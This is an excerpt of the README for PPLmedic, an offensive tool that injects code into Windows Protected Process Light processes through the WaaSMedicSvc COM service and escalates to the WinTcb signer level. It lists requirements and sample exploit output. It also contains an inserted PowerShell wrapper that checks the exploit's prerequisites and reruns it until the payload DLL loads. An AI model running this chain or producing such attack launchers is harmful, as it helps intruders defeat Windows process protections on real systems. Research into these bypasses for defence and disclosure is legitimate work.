This tool implements a **Userland** exploit chain for injecting arbitrary code into a PPL with the signer type `Windows` and elevating to the signer type `WinTcb`. These techniques were originally discussed by James Forshaw (a.k.a. [@tiraniddo](https://infosec.exchange/@tiraniddo)) in his blog post [Injecting Code into Windows Protected Processes using COM - Part 1](https://googleprojectzero.blogspot.com/2018/10/injecting-code-into-windows-protected.html).

To learn more about this tool, you should read its companion blog post here:

- [Bypassing PPL in Userland (again)](https://blog.scrt.ch/2023/03/14/bypassing-ppl-in-userland-again/)

## 💣 Disclaimer

[...]

- __Privileges:__ Administrator or SYSTEM with `SeDebugPrivilege`
- __Platform:__ Windows 10/11 or Windows Server 2019/2022
- __Architecture:__ Only __x86_64__ is supported

```bat
REM Use the option -p to elevate from PPL-Windows to PPL-WinTcb
[...]
[+] Payload DLL successfully loaded after 272 attempts!
[*] Deleting 272 temporary directories created by the service...
[...]
```

[...]

## 🚧 Known issues

### Error: "Unexpected error or timeout"

You get the following error because the exploit __timed out__ while trying to create a remote `TaskHandler` COM object. This usually means that the target service `WaaSMedicSvc` crashed, which the message that follows confirms: `[!] Service WaaSMedicSvc is no longer running`. __You should try to run the tool again.__

```console
[...]
```

### Error: "Reached the maximum number of attempts"

You get the following error because the exploit failed to write a valid object directory in __fewer than 1000 attempts__. This limit is a failsafe that prevents the target service from consuming too many resources. __You should try to run the tool again.__

```console
[...]
```

### Error: "Failed to write LdrpKnownDllDirectoryHandle value"

You get the following error because an unexpected error occurred when calling `LaunchDetectionOnly` or `LaunchRemediationOnly`. This should be quite rare. In the example below, the thread exit code `0x800706ba` is `HRESULT_FROM_WIN32(RPC_S_SERVER_UNAVAILABLE)` ("The RPC server is unavailable"), i.e. the remote COM call never reached the service. __You should try to run the tool again.__

```console
[...]
[-] Failed to write LdrpKnownDllDirectoryHandle value (thread exit code: 0x800706ba).
[...]
```

### Error: "Failed to cache sign ..."

You get the following error because the exploit __failed to cache sign__ the payload DLL. The oplock set on the catalog file was probably never triggered because the file was already open in the kernel. You can try to rerun the tool at a later time (for Windows 11, refer to the "Tests" section).
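
As an added example (not part of PPLmedic or its README), the following PowerShell wrapper checks the requirements listed above (x86_64, `SeDebugPrivilege`, presence of `WaaSMedicSvc`) and then automates the "run the tool again" advice given for the three transient errors in this section, while stopping on a cache-signing failure, which retrying immediately does not fix. The binary path, the argument pass-through and the retry count are assumptions; the error strings it matches are the ones quoted in this section.

```powershell
<#
  Added example (not part of PPLmedic): pre-flight checks for the documented
  requirements, then a retry loop for the transient failures listed under
  "Known issues". Assumptions (not from the project): PPLmedic.exe is in the
  current directory and extra arguments such as -p are passed straight through.
#>
param(
    [string]   $Exe       = '.\PPLmedic.exe',  # assumed location of the binary
    [string[]] $ExeArgs   = @(),               # e.g. @('-p') to elevate to PPL-WinTcb
    [int]      $MaxRuns   = 5,                 # assumed retry budget
    [int]      $PauseSecs = 5
)

function Test-Prerequisites {
    # Only x86_64 is supported: refuse 32-bit Windows and 32-bit PowerShell hosts.
    if (-not [Environment]::Is64BitOperatingSystem -or -not [Environment]::Is64BitProcess) {
        throw 'x86_64 only: run from a 64-bit PowerShell on 64-bit Windows.'
    }

    # SeDebugPrivilege must be present in the token. An elevated administrator
    # (or SYSTEM) token lists it, even when disabled; a filtered token does not.
    $privs = (whoami /priv) -join "`n"
    if ($privs -notmatch 'SeDebugPrivilege') {
        throw 'SeDebugPrivilege is not in the current token; run elevated or as SYSTEM.'
    }

    # The target service must exist. It is demand-start, so "Stopped" is normal,
    # but "Disabled" would block the COM activation the exploit depends on.
    $svc = Get-Service -Name 'WaaSMedicSvc' -ErrorAction SilentlyContinue
    if (-not $svc) { throw 'WaaSMedicSvc is not installed on this host.' }
    if ($svc.StartType -eq 'Disabled') { throw 'WaaSMedicSvc is disabled; the exploit cannot start it.' }
}

# Error strings the Known issues section marks as "run the tool again".
$Transient = @(
    'Unexpected error or timeout',
    'Reached the maximum number of attempts',
    'Failed to write LdrpKnownDllDirectoryHandle value'
)

Test-Prerequisites

for ($run = 1; $run -le $MaxRuns; $run++) {
    Write-Host "[*] Run $run of $MaxRuns : $Exe $($ExeArgs -join ' ')"
    $output = (& $Exe @ExeArgs 2>&1 | Out-String)
    Write-Host $output

    if ($output -match 'Payload DLL successfully loaded') {
        Write-Host '[+] Done.'
        exit 0
    }

    # A cache-signing failure depends on the catalog file being held open by the
    # kernel, not on a race; retrying right away is pointless, so stop here.
    if ($output -match 'Failed to cache sign') {
        Write-Warning 'Cache signing failed (catalog oplock never fired). Retry later; on Windows 11 see the "Tests" section.'
        exit 1
    }

    $hit = $Transient | Where-Object { $output -match [regex]::Escape($_) } | Select-Object -First 1
    if (-not $hit) {
        Write-Warning 'Unrecognised failure; not retrying.'
        exit 1
    }

    # Report the service state: after a timeout, "Stopped" confirms the crash the README describes.
    $state = (Get-Service -Name 'WaaSMedicSvc').Status
    Write-Host "[!] Transient failure '$hit' (WaaSMedicSvc is $state); retrying in $PauseSecs s..."
    Start-Sleep -Seconds $PauseSecs
}

Write-Warning "Gave up after $MaxRuns runs."
exit 1
```

The wrapper keys on the tool's output text rather than on its process exit code, because the README documents the messages but not the exit codes. Run it from an elevated 64-bit PowerShell, for example `.\Run-PPLmedic.ps1 -ExeArgs @('-p')` to go through the PPL-WinTcb path.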

[...]

2. Select `Release / x64` (`x86` is not supported!).
3. `Build > Build Solution`.

## Credits

- [@tiraniddo](https://infosec.exchange/@tiraniddo) - Injecting Code into Windows Protected Processes using COM - Part 1